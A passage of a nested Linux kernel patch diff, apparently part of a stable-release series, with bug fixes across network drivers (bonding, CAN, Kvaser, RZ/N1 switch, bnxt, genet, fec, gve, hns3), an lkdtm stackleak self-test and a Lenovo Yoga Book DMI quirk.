++			DMI_EXACT_MATCH(DMI_PRODUCT_VERSION, "YETI-11"),
++		},
++	}, {
++		/* Lenovo Yoga Book X91F / X91L */
++		.driver_data = (void *)(long)INTEL_CHT_WC_LENOVO_YOGABOOK1,
++		.matches = {
++			/* Non exact match to match F + L versions */
++			DMI_MATCH(DMI_PRODUCT_NAME, "Lenovo YB1-X91"),
+ 		},
+ 	},
+ 	{ }
+diff --git a/drivers/misc/lkdtm/stackleak.c b/drivers/misc/lkdtm/stackleak.c
+index 025b133297a6b..f1d0221609138 100644
+--- a/drivers/misc/lkdtm/stackleak.c
++++ b/drivers/misc/lkdtm/stackleak.c
+@@ -43,12 +43,14 @@ static void noinstr check_stackleak_irqoff(void)
+ 	 * STACK_END_MAGIC, and in either casee something is seriously wrong.
+ 	 */
+ 	if (current_sp < task_stack_low || current_sp >= task_stack_high) {
++		instrumentation_begin();
+ 		pr_err("FAIL: current_stack_pointer (0x%lx) outside of task stack bounds [0x%lx..0x%lx]\n",
+ 		       current_sp, task_stack_low, task_stack_high - 1);
+ 		test_failed = true;
+ 		goto out;
+ 	}
+ 	if (lowest_sp < task_stack_low || lowest_sp >= task_stack_high) {
++		instrumentation_begin();
+ 		pr_err("FAIL: current->lowest_stack (0x%lx) outside of task stack bounds [0x%lx..0x%lx]\n",
+ 		       lowest_sp, task_stack_low, task_stack_high - 1);
+ 		test_failed = true;
+@@ -86,11 +88,14 @@ static void noinstr check_stackleak_irqoff(void)
+ 		if (*(unsigned long *)poison_low == STACKLEAK_POISON)
+ 			continue;
+ 
++		instrumentation_begin();
+ 		pr_err("FAIL: non-poison value %lu bytes below poison boundary: 0x%lx\n",
+ 		       poison_high - poison_low, *(unsigned long *)poison_low);
+ 		test_failed = true;
++		goto out;
+ 	}
+ 
++	instrumentation_begin();
+ 	pr_info("stackleak stack usage:\n"
+ 		"  high offset: %lu bytes\n"
+ 		"  current:     %lu bytes\n"
+@@ -113,6 +118,7 @@ out:
+ 	} else {
+ 		pr_info("OK: the rest of the thread stack is properly erased\n");
+ 	}
++	instrumentation_end();
+ }
+ 
+ static void lkdtm_STACKLEAK_ERASING(void)
+diff --git a/drivers/net/bonding/bond_netlink.c b/drivers/net/bonding/bond_netlink.c
+index c2d080fc4fc4e..27cbe148f0db5 100644
+--- a/drivers/net/bonding/bond_netlink.c
++++ b/drivers/net/bonding/bond_netlink.c
+@@ -84,6 +84,11 @@ nla_put_failure:
+ 	return -EMSGSIZE;
+ }
+ 
++/* Limit the max delay range to 300s */
++static struct netlink_range_validation delay_range = {
++	.max = 300000,
++};
++
+ static const struct nla_policy bond_policy[IFLA_BOND_MAX + 1] = {
+ 	[IFLA_BOND_MODE]		= { .type = NLA_U8 },
+ 	[IFLA_BOND_ACTIVE_SLAVE]	= { .type = NLA_U32 },
+@@ -114,7 +119,7 @@ static const struct nla_policy bond_policy[IFLA_BOND_MAX + 1] = {
+ 	[IFLA_BOND_AD_ACTOR_SYSTEM]	= { .type = NLA_BINARY,
+ 					    .len  = ETH_ALEN },
+ 	[IFLA_BOND_TLB_DYNAMIC_LB]	= { .type = NLA_U8 },
+-	[IFLA_BOND_PEER_NOTIF_DELAY]    = { .type = NLA_U32 },
++	[IFLA_BOND_PEER_NOTIF_DELAY]    = NLA_POLICY_FULL_RANGE(NLA_U32, &delay_range),
+ 	[IFLA_BOND_MISSED_MAX]		= { .type = NLA_U8 },
+ 	[IFLA_BOND_NS_IP6_TARGET]	= { .type = NLA_NESTED },
+ };
+diff --git a/drivers/net/bonding/bond_options.c b/drivers/net/bonding/bond_options.c
+index 3498db1c1b3c7..5bb2c098bf4df 100644
+--- a/drivers/net/bonding/bond_options.c
++++ b/drivers/net/bonding/bond_options.c
+@@ -169,6 +169,12 @@ static const struct bond_opt_value bond_num_peer_notif_tbl[] = {
+ 	{ NULL,      -1,  0}
+ };
+ 
++static const struct bond_opt_value bond_peer_notif_delay_tbl[] = {
++	{ "off",     0,   0},
++	{ "maxval",  300000, BOND_VALFLAG_MAX},
++	{ NULL,      -1,  0}
++};
++
+ static const struct bond_opt_value bond_primary_reselect_tbl[] = {
+ 	{ "always",  BOND_PRI_RESELECT_ALWAYS,  BOND_VALFLAG_DEFAULT},
+ 	{ "better",  BOND_PRI_RESELECT_BETTER,  0},
+@@ -488,7 +494,7 @@ static const struct bond_option bond_opts[BOND_OPT_LAST] = {
+ 		.id = BOND_OPT_PEER_NOTIF_DELAY,
+ 		.name = "peer_notif_delay",
+ 		.desc = "Delay between each peer notification on failover event, in milliseconds",
+-		.values = bond_intmax_tbl,
++		.values = bond_peer_notif_delay_tbl,
+ 		.set = bond_option_peer_notif_delay_set
+ 	}
+ };
+diff --git a/drivers/net/can/dev/skb.c b/drivers/net/can/dev/skb.c
+index 241ec636e91fd..f6d05b3ef59ab 100644
+--- a/drivers/net/can/dev/skb.c
++++ b/drivers/net/can/dev/skb.c
+@@ -54,7 +54,8 @@ int can_put_echo_skb(struct sk_buff *skb, struct net_device *dev,
+ 	/* check flag whether this packet has to be looped back */
+ 	if (!(dev->flags & IFF_ECHO) ||
+ 	    (skb->protocol != htons(ETH_P_CAN) &&
+-	     skb->protocol != htons(ETH_P_CANFD))) {
++	     skb->protocol != htons(ETH_P_CANFD) &&
++	     skb->protocol != htons(ETH_P_CANXL))) {
+ 		kfree_skb(skb);
+ 		return 0;
+ 	}
+diff --git a/drivers/net/can/kvaser_pciefd.c b/drivers/net/can/kvaser_pciefd.c
+index bcad11709bc98..956a4a57396f9 100644
+--- a/drivers/net/can/kvaser_pciefd.c
++++ b/drivers/net/can/kvaser_pciefd.c
+@@ -71,10 +71,12 @@ MODULE_DESCRIPTION("CAN driver for Kvaser CAN/PCIe devices");
+ #define KVASER_PCIEFD_SYSID_BUILD_REG (KVASER_PCIEFD_SYSID_BASE + 0x14)
+ /* Shared receive buffer registers */
+ #define KVASER_PCIEFD_SRB_BASE 0x1f200
++#define KVASER_PCIEFD_SRB_FIFO_LAST_REG (KVASER_PCIEFD_SRB_BASE + 0x1f4)
+ #define KVASER_PCIEFD_SRB_CMD_REG (KVASER_PCIEFD_SRB_BASE + 0x200)
+ #define KVASER_PCIEFD_SRB_IEN_REG (KVASER_PCIEFD_SRB_BASE + 0x204)
+ #define KVASER_PCIEFD_SRB_IRQ_REG (KVASER_PCIEFD_SRB_BASE + 0x20c)
+ #define KVASER_PCIEFD_SRB_STAT_REG (KVASER_PCIEFD_SRB_BASE + 0x210)
++#define KVASER_PCIEFD_SRB_RX_NR_PACKETS_REG (KVASER_PCIEFD_SRB_BASE + 0x214)
+ #define KVASER_PCIEFD_SRB_CTRL_REG (KVASER_PCIEFD_SRB_BASE + 0x218)
+ /* EPCS flash controller registers */
+ #define KVASER_PCIEFD_SPI_BASE 0x1fc00
+@@ -111,6 +113,9 @@ MODULE_DESCRIPTION("CAN driver for Kvaser CAN/PCIe devices");
+ /* DMA support */
+ #define KVASER_PCIEFD_SRB_STAT_DMA BIT(24)
+ 
++/* SRB current packet level */
++#define KVASER_PCIEFD_SRB_RX_NR_PACKETS_MASK 0xff
++
+ /* DMA Enable */
+ #define KVASER_PCIEFD_SRB_CTRL_DMA_ENABLE BIT(0)
+ 
+@@ -526,7 +531,7 @@ static int kvaser_pciefd_set_tx_irq(struct kvaser_pciefd_can *can)
+ 	      KVASER_PCIEFD_KCAN_IRQ_TOF | KVASER_PCIEFD_KCAN_IRQ_ABD |
+ 	      KVASER_PCIEFD_KCAN_IRQ_TAE | KVASER_PCIEFD_KCAN_IRQ_TAL |
+ 	      KVASER_PCIEFD_KCAN_IRQ_FDIC | KVASER_PCIEFD_KCAN_IRQ_BPP |
+-	      KVASER_PCIEFD_KCAN_IRQ_TAR | KVASER_PCIEFD_KCAN_IRQ_TFD;
++	      KVASER_PCIEFD_KCAN_IRQ_TAR;
+ 
+ 	iowrite32(msk, can->reg_base + KVASER_PCIEFD_KCAN_IEN_REG);
+ 
+@@ -554,6 +559,8 @@ static void kvaser_pciefd_setup_controller(struct kvaser_pciefd_can *can)
+ 
+ 	if (can->can.ctrlmode & CAN_CTRLMODE_LISTENONLY)
+ 		mode |= KVASER_PCIEFD_KCAN_MODE_LOM;
++	else
++		mode &= ~KVASER_PCIEFD_KCAN_MODE_LOM;
+ 
+ 	mode |= KVASER_PCIEFD_KCAN_MODE_EEN;
+ 	mode |= KVASER_PCIEFD_KCAN_MODE_EPEN;
+@@ -572,7 +579,7 @@ static void kvaser_pciefd_start_controller_flush(struct kvaser_pciefd_can *can)
+ 
+ 	spin_lock_irqsave(&can->lock, irq);
+ 	iowrite32(-1, can->reg_base + KVASER_PCIEFD_KCAN_IRQ_REG);
+-	iowrite32(KVASER_PCIEFD_KCAN_IRQ_ABD | KVASER_PCIEFD_KCAN_IRQ_TFD,
++	iowrite32(KVASER_PCIEFD_KCAN_IRQ_ABD,
+ 		  can->reg_base + KVASER_PCIEFD_KCAN_IEN_REG);
+ 
+ 	status = ioread32(can->reg_base + KVASER_PCIEFD_KCAN_STAT_REG);
+@@ -615,7 +622,7 @@ static int kvaser_pciefd_bus_on(struct kvaser_pciefd_can *can)
+ 	iowrite32(0, can->reg_base + KVASER_PCIEFD_KCAN_IEN_REG);
+ 	iowrite32(-1, can->reg_base + KVASER_PCIEFD_KCAN_IRQ_REG);
+ 
+-	iowrite32(KVASER_PCIEFD_KCAN_IRQ_ABD | KVASER_PCIEFD_KCAN_IRQ_TFD,
++	iowrite32(KVASER_PCIEFD_KCAN_IRQ_ABD,
+ 		  can->reg_base + KVASER_PCIEFD_KCAN_IEN_REG);
+ 
+ 	mode = ioread32(can->reg_base + KVASER_PCIEFD_KCAN_MODE_REG);
+@@ -719,6 +726,7 @@ static int kvaser_pciefd_stop(struct net_device *netdev)
+ 		iowrite32(0, can->reg_base + KVASER_PCIEFD_KCAN_IEN_REG);
+ 		del_timer(&can->bec_poll_timer);
+ 	}
++	can->can.state = CAN_STATE_STOPPED;
+ 	close_candev(netdev);
+ 
+ 	return ret;
+@@ -1007,8 +1015,7 @@ static int kvaser_pciefd_setup_can_ctrls(struct kvaser_pciefd *pcie)
+ 		SET_NETDEV_DEV(netdev, &pcie->pci->dev);
+ 
+ 		iowrite32(-1, can->reg_base + KVASER_PCIEFD_KCAN_IRQ_REG);
+-		iowrite32(KVASER_PCIEFD_KCAN_IRQ_ABD |
+-			  KVASER_PCIEFD_KCAN_IRQ_TFD,
++		iowrite32(KVASER_PCIEFD_KCAN_IRQ_ABD,
+ 			  can->reg_base + KVASER_PCIEFD_KCAN_IEN_REG);
+ 
+ 		pcie->can[i] = can;
+@@ -1058,6 +1065,7 @@ static int kvaser_pciefd_setup_dma(struct kvaser_pciefd *pcie)
+ {
+ 	int i;
+ 	u32 srb_status;
++	u32 srb_packet_count;
+ 	dma_addr_t dma_addr[KVASER_PCIEFD_DMA_COUNT];
+ 
+ 	/* Disable the DMA */
+@@ -1085,6 +1093,15 @@ static int kvaser_pciefd_setup_dma(struct kvaser_pciefd *pcie)
+ 		  KVASER_PCIEFD_SRB_CMD_RDB1,
+ 		  pcie->reg_base + KVASER_PCIEFD_SRB_CMD_REG);
+ 
++	/* Empty Rx FIFO */
++	srb_packet_count = ioread32(pcie->reg_base + KVASER_PCIEFD_SRB_RX_NR_PACKETS_REG) &
++			   KVASER_PCIEFD_SRB_RX_NR_PACKETS_MASK;
++	while (srb_packet_count) {
++		/* Drop current packet in FIFO */
++		ioread32(pcie->reg_base + KVASER_PCIEFD_SRB_FIFO_LAST_REG);
++		srb_packet_count--;
++	}
++
+ 	srb_status = ioread32(pcie->reg_base + KVASER_PCIEFD_SRB_STAT_REG);
+ 	if (!(srb_status & KVASER_PCIEFD_SRB_STAT_DI)) {
+ 		dev_err(&pcie->pci->dev, "DMA not idle before enabling\n");
+@@ -1425,9 +1442,6 @@ static int kvaser_pciefd_handle_status_packet(struct kvaser_pciefd *pcie,
+ 		cmd = KVASER_PCIEFD_KCAN_CMD_AT;
+ 		cmd |= ++can->cmd_seq << KVASER_PCIEFD_KCAN_CMD_SEQ_SHIFT;
+ 		iowrite32(cmd, can->reg_base + KVASER_PCIEFD_KCAN_CMD_REG);
+-
+-		iowrite32(KVASER_PCIEFD_KCAN_IRQ_TFD,
+-			  can->reg_base + KVASER_PCIEFD_KCAN_IEN_REG);
+ 	} else if (p->header[0] & KVASER_PCIEFD_SPACK_IDET &&
+ 		   p->header[0] & KVASER_PCIEFD_SPACK_IRM &&
+ 		   cmdseq == (p->header[1] & KVASER_PCIEFD_PACKET_SEQ_MSK) &&
+@@ -1714,15 +1728,6 @@ static int kvaser_pciefd_transmit_irq(struct kvaser_pciefd_can *can)
+ 	if (irq & KVASER_PCIEFD_KCAN_IRQ_TOF)
+ 		netdev_err(can->can.dev, "Tx FIFO overflow\n");
+ 
+-	if (irq & KVASER_PCIEFD_KCAN_IRQ_TFD) {
+-		u8 count = ioread32(can->reg_base +
+-				    KVASER_PCIEFD_KCAN_TX_NPACKETS_REG) & 0xff;
+-
+-		if (count == 0)
+-			iowrite32(KVASER_PCIEFD_KCAN_CTRL_EFLUSH,
+-				  can->reg_base + KVASER_PCIEFD_KCAN_CTRL_REG);
+-	}
+-
+ 	if (irq & KVASER_PCIEFD_KCAN_IRQ_BPP)
+ 		netdev_err(can->can.dev,
+ 			   "Fail to change bittiming, when not in reset mode\n");
+@@ -1824,6 +1829,11 @@ static int kvaser_pciefd_probe(struct pci_dev *pdev,
+ 	if (err)
+ 		goto err_teardown_can_ctrls;
+ 
++	err = request_irq(pcie->pci->irq, kvaser_pciefd_irq_handler,
++			  IRQF_SHARED, KVASER_PCIEFD_DRV_NAME, pcie);
++	if (err)
++		goto err_teardown_can_ctrls;
++
+ 	iowrite32(KVASER_PCIEFD_SRB_IRQ_DPD0 | KVASER_PCIEFD_SRB_IRQ_DPD1,
+ 		  pcie->reg_base + KVASER_PCIEFD_SRB_IRQ_REG);
+ 
+@@ -1844,11 +1854,6 @@ static int kvaser_pciefd_probe(struct pci_dev *pdev,
+ 	iowrite32(KVASER_PCIEFD_SRB_CMD_RDB1,
+ 		  pcie->reg_base + KVASER_PCIEFD_SRB_CMD_REG);
+ 
+-	err = request_irq(pcie->pci->irq, kvaser_pciefd_irq_handler,
+-			  IRQF_SHARED, KVASER_PCIEFD_DRV_NAME, pcie);
+-	if (err)
+-		goto err_teardown_can_ctrls;
+-
+ 	err = kvaser_pciefd_reg_candev(pcie);
+ 	if (err)
+ 		goto err_free_irq;
+@@ -1856,6 +1861,8 @@ static int kvaser_pciefd_probe(struct pci_dev *pdev,
+ 	return 0;
+ 
+ err_free_irq:
++	/* Disable PCI interrupts */
++	iowrite32(0, pcie->reg_base + KVASER_PCIEFD_IEN_REG);
+ 	free_irq(pcie->pci->irq, pcie);
+ 
+ err_teardown_can_ctrls:
+diff --git a/drivers/net/dsa/mv88e6xxx/port.h b/drivers/net/dsa/mv88e6xxx/port.h
+index cb04243f37c1e..a91e22d9a6cb3 100644
+--- a/drivers/net/dsa/mv88e6xxx/port.h
++++ b/drivers/net/dsa/mv88e6xxx/port.h
+@@ -276,7 +276,7 @@
+ /* Offset 0x10: Extended Port Control Command */
+ #define MV88E6393X_PORT_EPC_CMD		0x10
+ #define MV88E6393X_PORT_EPC_CMD_BUSY	0x8000
+-#define MV88E6393X_PORT_EPC_CMD_WRITE	0x0300
++#define MV88E6393X_PORT_EPC_CMD_WRITE	0x3000
+ #define MV88E6393X_PORT_EPC_INDEX_PORT_ETYPE	0x02
+ 
+ /* Offset 0x11: Extended Port Control Data */
+diff --git a/drivers/net/dsa/rzn1_a5psw.c b/drivers/net/dsa/rzn1_a5psw.c
+index ed413d555beca..790e177e2aef6 100644
+--- a/drivers/net/dsa/rzn1_a5psw.c
++++ b/drivers/net/dsa/rzn1_a5psw.c
+@@ -120,6 +120,22 @@ static void a5psw_port_mgmtfwd_set(struct a5psw *a5psw, int port, bool enable)
+ 	a5psw_port_pattern_set(a5psw, port, A5PSW_PATTERN_MGMTFWD, enable);
+ }
+ 
++static void a5psw_port_tx_enable(struct a5psw *a5psw, int port, bool enable)
++{
++	u32 mask = A5PSW_PORT_ENA_TX(port);
++	u32 reg = enable ? mask : 0;
++
++	/* Even though the port TX is disabled through TXENA bit in the
++	 * PORT_ENA register, it can still send BPDUs. This depends on the tag
++	 * configuration added when sending packets from the CPU port to the
++	 * switch port. Indeed, when using forced forwarding without filtering,
++	 * even disabled ports will be able to send packets that are tagged.
++	 * This allows to implement STP support when ports are in a state where
++	 * forwarding traffic should be stopped but BPDUs should still be sent.
++	 */
++	a5psw_reg_rmw(a5psw, A5PSW_PORT_ENA, mask, reg);
++}
++
+ static void a5psw_port_enable_set(struct a5psw *a5psw, int port, bool enable)
+ {
+ 	u32 port_ena = 0;
+@@ -292,6 +308,22 @@ static int a5psw_set_ageing_time(struct dsa_switch *ds, unsigned int msecs)
+ 	return 0;
+ }
+ 
++static void a5psw_port_learning_set(struct a5psw *a5psw, int port, bool learn)
++{
++	u32 mask = A5PSW_INPUT_LEARN_DIS(port);
++	u32 reg = !learn ? mask : 0;
++
++	a5psw_reg_rmw(a5psw, A5PSW_INPUT_LEARN, mask, reg);
++}
++
++static void a5psw_port_rx_block_set(struct a5psw *a5psw, int port, bool block)
++{
++	u32 mask = A5PSW_INPUT_LEARN_BLOCK(port);
++	u32 reg = block ? mask : 0;
++
++	a5psw_reg_rmw(a5psw, A5PSW_INPUT_LEARN, mask, reg);
++}
++
+ static void a5psw_flooding_set_resolution(struct a5psw *a5psw, int port,
+ 					  bool set)
+ {
+@@ -308,6 +340,14 @@ static void a5psw_flooding_set_resolution(struct a5psw *a5psw, int port,
+ 		a5psw_reg_writel(a5psw, offsets[i], a5psw->bridged_ports);
+ }
+ 
++static void a5psw_port_set_standalone(struct a5psw *a5psw, int port,
++				      bool standalone)
++{
++	a5psw_port_learning_set(a5psw, port, !standalone);
++	a5psw_flooding_set_resolution(a5psw, port, !standalone);
++	a5psw_port_mgmtfwd_set(a5psw, port, standalone);
++}
++
+ static int a5psw_port_bridge_join(struct dsa_switch *ds, int port,
+ 				  struct dsa_bridge bridge,
+ 				  bool *tx_fwd_offload,
+@@ -323,8 +363,7 @@ static int a5psw_port_bridge_join(struct dsa_switch *ds, int port,
+ 	}
+ 
+ 	a5psw->br_dev = bridge.dev;
+-	a5psw_flooding_set_resolution(a5psw, port, true);
+-	a5psw_port_mgmtfwd_set(a5psw, port, false);
++	a5psw_port_set_standalone(a5psw, port, false);
+ 
+ 	return 0;
+ }
+@@ -334,8 +373,7 @@ static void a5psw_port_bridge_leave(struct dsa_switch *ds, int port,
+ {
+ 	struct a5psw *a5psw = ds->priv;
+ 
+-	a5psw_flooding_set_resolution(a5psw, port, false);
+-	a5psw_port_mgmtfwd_set(a5psw, port, true);
++	a5psw_port_set_standalone(a5psw, port, true);
+ 
+ 	/* No more ports bridged */
+ 	if (a5psw->bridged_ports == BIT(A5PSW_CPU_PORT))
+@@ -344,28 +382,35 @@ static void a5psw_port_bridge_leave(struct dsa_switch *ds, int port,
+ 
+ static void a5psw_port_stp_state_set(struct dsa_switch *ds, int port, u8 state)
+ {
+-	u32 mask = A5PSW_INPUT_LEARN_DIS(port) | A5PSW_INPUT_LEARN_BLOCK(port);
++	bool learning_enabled, rx_enabled, tx_enabled;
+ 	struct a5psw *a5psw = ds->priv;
+-	u32 reg = 0;
+ 
+ 	switch (state) {
+ 	case BR_STATE_DISABLED:
+ 	case BR_STATE_BLOCKING:
+-		reg |= A5PSW_INPUT_LEARN_DIS(port);
+-		reg |= A5PSW_INPUT_LEARN_BLOCK(port);
+-		break;
+ 	case BR_STATE_LISTENING:
+-		reg |= A5PSW_INPUT_LEARN_DIS(port);
++		rx_enabled = false;
++		tx_enabled = false;
++		learning_enabled = false;
+ 		break;
+ 	case BR_STATE_LEARNING:
+-		reg |= A5PSW_INPUT_LEARN_BLOCK(port);
++		rx_enabled = false;
++		tx_enabled = false;
++		learning_enabled = true;
+ 		break;
+ 	case BR_STATE_FORWARDING:
+-	default:
++		rx_enabled = true;
++		tx_enabled = true;
++		learning_enabled = true;
+ 		break;
++	default:
++		dev_err(ds->dev, "invalid STP state: %d\n", state);
++		return;
+ 	}
+ 
+-	a5psw_reg_rmw(a5psw, A5PSW_INPUT_LEARN, mask, reg);
++	a5psw_port_learning_set(a5psw, port, learning_enabled);
++	a5psw_port_rx_block_set(a5psw, port, !rx_enabled);
++	a5psw_port_tx_enable(a5psw, port, tx_enabled);
+ }
+ 
+ static void a5psw_port_fast_age(struct dsa_switch *ds, int port)
+@@ -673,7 +718,7 @@ static int a5psw_setup(struct dsa_switch *ds)
+ 	}
+ 
+ 	/* Configure management port */
+-	reg = A5PSW_CPU_PORT | A5PSW_MGMT_CFG_DISCARD;
++	reg = A5PSW_CPU_PORT | A5PSW_MGMT_CFG_ENABLE;
+ 	a5psw_reg_writel(a5psw, A5PSW_MGMT_CFG, reg);
+ 
+ 	/* Set pattern 0 to forward all frame to mgmt port */
+@@ -722,13 +767,15 @@ static int a5psw_setup(struct dsa_switch *ds)
+ 		if (dsa_port_is_unused(dp))
+ 			continue;
+ 
+-		/* Enable egress flooding for CPU port */
+-		if (dsa_port_is_cpu(dp))
++		/* Enable egress flooding and learning for CPU port */
++		if (dsa_port_is_cpu(dp)) {
+ 			a5psw_flooding_set_resolution(a5psw, port, true);
++			a5psw_port_learning_set(a5psw, port, true);
++		}
+ 
+-		/* Enable management forward only for user ports */
++		/* Enable standalone mode for user ports */
+ 		if (dsa_port_is_user(dp))
+-			a5psw_port_mgmtfwd_set(a5psw, port, true);
++			a5psw_port_set_standalone(a5psw, port, true);
+ 	}
+ 
+ 	return 0;
+diff --git a/drivers/net/dsa/rzn1_a5psw.h b/drivers/net/dsa/rzn1_a5psw.h
+index c67abd49c013d..b869192eef3f7 100644
+--- a/drivers/net/dsa/rzn1_a5psw.h
++++ b/drivers/net/dsa/rzn1_a5psw.h
+@@ -19,6 +19,7 @@
+ #define A5PSW_PORT_OFFSET(port)		(0x400 * (port))
+ 
+ #define A5PSW_PORT_ENA			0x8
++#define A5PSW_PORT_ENA_TX(port)		BIT(port)
+ #define A5PSW_PORT_ENA_RX_SHIFT		16
+ #define A5PSW_PORT_ENA_TX_RX(port)	(BIT((port) + A5PSW_PORT_ENA_RX_SHIFT) | \
+ 					 BIT(port))
+@@ -36,7 +37,7 @@
+ #define A5PSW_INPUT_LEARN_BLOCK(p)	BIT(p)
+ 
+ #define A5PSW_MGMT_CFG			0x20
+-#define A5PSW_MGMT_CFG_DISCARD		BIT(7)
++#define A5PSW_MGMT_CFG_ENABLE		BIT(6)
+ 
+ #define A5PSW_MODE_CFG			0x24
+ #define A5PSW_MODE_STATS_RESET		BIT(31)
+diff --git a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+index 01b973bc509f5..b2d531e014c57 100644
+--- a/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
++++ b/drivers/net/ethernet/broadcom/bnxt/bnxt_ethtool.c
+@@ -2822,7 +2822,7 @@ static int bnxt_get_nvram_directory(struct net_device *dev, u32 len, u8 *data)
+ 	if (rc)
+ 		return rc;
+ 
+-	buflen = dir_entries * entry_length;
++	buflen = mul_u32_u32(dir_entries, entry_length);
+ 	buf = hwrm_req_dma_slice(bp, req, buflen, &dma_handle);
+ 	if (!buf) {
+ 		hwrm_req_drop(bp, req);
+diff --git a/drivers/net/ethernet/broadcom/genet/bcmgenet.c b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+index f679ed54b3ef2..4da2becfa950c 100644
+--- a/drivers/net/ethernet/broadcom/genet/bcmgenet.c
++++ b/drivers/net/ethernet/broadcom/genet/bcmgenet.c
+@@ -3445,7 +3445,7 @@ err_clk_disable:
+ 	return ret;
+ }
+ 
+-static void bcmgenet_netif_stop(struct net_device *dev)
++static void bcmgenet_netif_stop(struct net_device *dev, bool stop_phy)
+ {
+ 	struct bcmgenet_priv *priv = netdev_priv(dev);
+ 
+@@ -3460,7 +3460,8 @@ static void bcmgenet_netif_stop(struct net_device *dev)
+ 	/* Disable MAC transmit. TX DMA disabled must be done before this */
+ 	umac_enable_set(priv, CMD_TX_EN, false);
+ 
+-	phy_stop(dev->phydev);
++	if (stop_phy)
++		phy_stop(dev->phydev);
+ 	bcmgenet_disable_rx_napi(priv);
+ 	bcmgenet_intr_disable(priv);
+ 
+@@ -3481,7 +3482,7 @@ static int bcmgenet_close(struct net_device *dev)
+ 
+ 	netif_dbg(priv, ifdown, dev, "bcmgenet_close\n");
+ 
+-	bcmgenet_netif_stop(dev);
++	bcmgenet_netif_stop(dev, false);
+ 
+ 	/* Really kill the PHY state machine and disconnect from it */
+ 	phy_disconnect(dev->phydev);
+@@ -4299,7 +4300,7 @@ static int bcmgenet_suspend(struct device *d)
+ 
+ 	netif_device_detach(dev);
+ 
+-	bcmgenet_netif_stop(dev);
++	bcmgenet_netif_stop(dev, true);
+ 
+ 	if (!device_may_wakeup(d))
+ 		phy_suspend(dev->phydev);
+diff --git a/drivers/net/ethernet/freescale/fec_main.c b/drivers/net/ethernet/freescale/fec_main.c
+index 6f914180f4797..33226a22d8a4a 100644
+--- a/drivers/net/ethernet/freescale/fec_main.c
++++ b/drivers/net/ethernet/freescale/fec_main.c
+@@ -4168,9 +4168,11 @@ fec_drv_remove(struct platform_device *pdev)
+ 	struct device_node *np = pdev->dev.of_node;
+ 	int ret;
+ 
+-	ret = pm_runtime_resume_and_get(&pdev->dev);
++	ret = pm_runtime_get_sync(&pdev->dev);
+ 	if (ret < 0)
+-		return ret;
++		dev_err(&pdev->dev,
++			"Failed to resume device in remove callback (%pe)\n",
++			ERR_PTR(ret));
+ 
+ 	cancel_work_sync(&fep->tx_timeout_work);
+ 	fec_ptp_stop(pdev);
+@@ -4183,8 +4185,13 @@ fec_drv_remove(struct platform_device *pdev)
+ 		of_phy_deregister_fixed_link(np);
+ 	of_node_put(fep->phy_node);
+ 
+-	clk_disable_unprepare(fep->clk_ahb);
+-	clk_disable_unprepare(fep->clk_ipg);
++	/* After pm_runtime_get_sync() failed, the clks are still off, so skip
++	 * disabling them again.
++	 */
++	if (ret >= 0) {
++		clk_disable_unprepare(fep->clk_ahb);
++		clk_disable_unprepare(fep->clk_ipg);
++	}
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 	pm_runtime_disable(&pdev->dev);
+ 
+diff --git a/drivers/net/ethernet/google/gve/gve_main.c b/drivers/net/ethernet/google/gve/gve_main.c
+index d3e3ac242bfc3..2e5e0a8872704 100644
+--- a/drivers/net/ethernet/google/gve/gve_main.c
++++ b/drivers/net/ethernet/google/gve/gve_main.c
+@@ -239,19 +239,6 @@ static int gve_napi_poll_dqo(struct napi_struct *napi, int budget)
+ 	bool reschedule = false;
+ 	int work_done = 0;
+ 
+-	/* Clear PCI MSI-X Pending Bit Array (PBA)
+-	 *
+-	 * This bit is set if an interrupt event occurs while the vector is
+-	 * masked. If this bit is set and we reenable the interrupt, it will
+-	 * fire again. Since we're just about to poll the queue state, we don't
+-	 * need it to fire again.
+-	 *
+-	 * Under high softirq load, it's possible that the interrupt condition
+-	 * is triggered twice before we got the chance to process it.
+-	 */
+-	gve_write_irq_doorbell_dqo(priv, block,
+-				   GVE_ITR_NO_UPDATE_DQO | GVE_ITR_CLEAR_PBA_BIT_DQO);
+-
+ 	if (block->tx)
+ 		reschedule |= gve_tx_poll_dqo(block, /*do_clean=*/true);
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.c b/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.c
+index f671a63cecde4..c797d54f98caa 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3_common/hclge_comm_cmd.c
+@@ -330,9 +330,25 @@ static int hclge_comm_cmd_csq_done(struct hclge_comm_hw *hw)
+ 	return head == hw->cmq.csq.next_to_use;
+ }
+ 
+-static void hclge_comm_wait_for_resp(struct hclge_comm_hw *hw,
++static u32 hclge_get_cmdq_tx_timeout(u16 opcode, u32 tx_timeout)
++{
++	static const struct hclge_cmdq_tx_timeout_map cmdq_tx_timeout_map[] = {
++		{HCLGE_OPC_CFG_RST_TRIGGER, HCLGE_COMM_CMDQ_TX_TIMEOUT_500MS},
++	};
++	u32 i;
++
++	for (i = 0; i < ARRAY_SIZE(cmdq_tx_timeout_map); i++)
++		if (cmdq_tx_timeout_map[i].opcode == opcode)
++			return cmdq_tx_timeout_map[i].tx_timeout;
++
++	return tx_timeout;
++}
++
++static void hclge_comm_wait_for_resp(struct hclge_comm_hw *hw, u16 opcode,
+ 				     bool *is_completed)
+ {
++	u32 cmdq_tx_timeout = hclge_get_cmdq_tx_timeout(opcode,
++							hw->cmq.tx_timeout);
+ 	u32 timeout = 0;
+ 
+ 	do {
+@@ -342,7 +358,7 @@ static void hclge_comm_wait_for_resp(struct hclge_comm_hw *hw,
+ 		}
+ 		udelay(1);
+ 		timeout++;
+-	} while (timeout < hw->cmq.tx_timeout);
++	} while (timeout < cmdq_tx_timeout);
+ }
+ 
+ static int hclge_comm_cmd_convert_err_code(u16 desc_ret)
+@@ -406,7 +422,8 @@ static int hclge_comm_cmd_check_result(struct hclge_comm_hw *hw,
+ 	 * if multi descriptors to be sent, use the first one to check
+ 	 */
+ 	if (HCLGE_COMM_SEND_SYNC(le16_to_cpu(desc->flag)))
+-		hclge_comm_wait_for_resp(hw, &is_completed);
++		hclge_comm_wait_for_resp(hw, le16_to_cpu(desc->opcode),
++					 &is_completed);
+ 
